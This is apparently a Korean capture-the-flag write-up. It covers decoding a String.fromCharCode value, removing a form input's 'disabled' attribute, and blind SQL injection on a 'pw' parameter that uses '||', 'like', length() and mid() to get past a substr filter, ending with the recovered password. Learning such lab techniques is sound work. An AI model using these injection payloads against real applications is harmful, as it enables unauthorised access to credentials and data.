YesYes

그냥 백색밖에 안나오길래 어떻게풀어야하나.....보다가

이런식으로 나온부분을 발견했다.

String.fromCharCode 뒷부분이 HTML URL 인코딩 같길래 인코딩 값을 보면서 풀었더니 답이 나왔다.

%2528104%252C68%252C117%252C102%252C106%252C100%252C107%252C105%252C49%252C53%252C54%2529%22%29

%25 28104 %25 2C68 %25 2C117 %25 2C102 %25 2C106 %25 2C100 %25 2C107 %25 2C105 %25 2C49 %25 2C53 %25 2C54 %25 29 %22 %29

%28 104 %2C 68 %2C 117 %2C 102 %2C 106 %2C 100 %2C 107 %2C105 %2C 49 %2C 53 %2C 54 %29 " )

(104, 68, 117, 102, 106, 100, 107, 105, 49, 53, 54 ) " ) -> 숫자들을 문자로 출력!

hDufjdki156

창이 이런식인데 문제에서

저기에 입력을하고 클릭까지 하게끔 누를수 없는걸 해제하라고한다.

이게 소스코드인데 input disabled type 에서 disabled 이 문제다.

disabled 가 input 태그를 막는다.

그래서 disabled를 지워주면 된다.

이 창이 나오는데 저기 패스워드 이즈 뒤에 있는게 답!!

?pw=1' || id like 'admin' && length(pw) like 8# -> 길이가 8이다!
?pw=1%27%20||%20id%20like%20%27admin%27%20%26%26%20length(pw)%20like%208%23

substr이 막혀서 이제 mid나 substring, right, left를 사용한다고한다.

?pw=%27%20||%20mid(pw,1,1)%20like%207%23
?pw=' || mid(pw,1,1) like 7#
mid(문자열,위치,길이)
select mid('abcde',2,2) -> bc

(substring도 같음)

?pw=77d6290b